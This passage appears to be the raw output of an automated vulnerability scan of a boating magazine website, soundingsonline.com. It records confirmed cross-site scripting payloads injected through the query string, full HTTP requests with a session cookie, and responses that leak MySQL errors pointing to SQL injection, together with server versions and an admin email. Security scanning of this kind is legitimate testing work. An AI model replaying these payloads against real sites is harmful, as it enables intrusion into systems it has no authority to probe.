<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC..
- /columns-blogs/books

/columns-blogs/books CONFIRMED

http://www.soundingsonline.com/columns-blogs/books?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eale..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x001F89)</script>

Request

GET /columns-blogs/books?'"--></style></script><script>netsparker(0x001F89)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=majqkkfsuboh8ev9cfeblgcbi6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:31:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:31:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x001F89)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x001F89)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/columns-blogs/books" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Book Reviews of Nautical, Boating and Marine Based Books | Soundings Online</title> <link href="/columns-blogs/books?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/columns-blogs/books?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_columns_blogs c_uncategorized m_book_reviews"><!--
Type of page: category<br />Section: 8, s_columns_blogs<br />Category: 672, c_uncategorized<br />Menu: 102, m_book_reviews-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&a..
- /component/content/article/237622

/component/content/article/237622 CONFIRMED

http://www.soundingsonline.com/component/content/article/237622?'%22--%3E%3C/style%3E%3C/script%3E%3..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x001F8A)</script>

Request

GET /component/content/article/237622?'"--></style></script><script>netsparker(0x001F8A)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=majqkkfsuboh8ev9cfeblgcbi6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:31:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:31:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x001F8A)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x001F8A)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/component/content/article/237622" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="title" content="Classified Options" /> <meta name="author" content="Kelly Leach" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Classified Options</title> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_uncategorized c_uncategorized m_uncategorized"><!--
Type of page: article<br />Section: 0, s_uncategorized<br />Category: 0, c_uncategorized<br />Menu: , m_uncategorized-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a 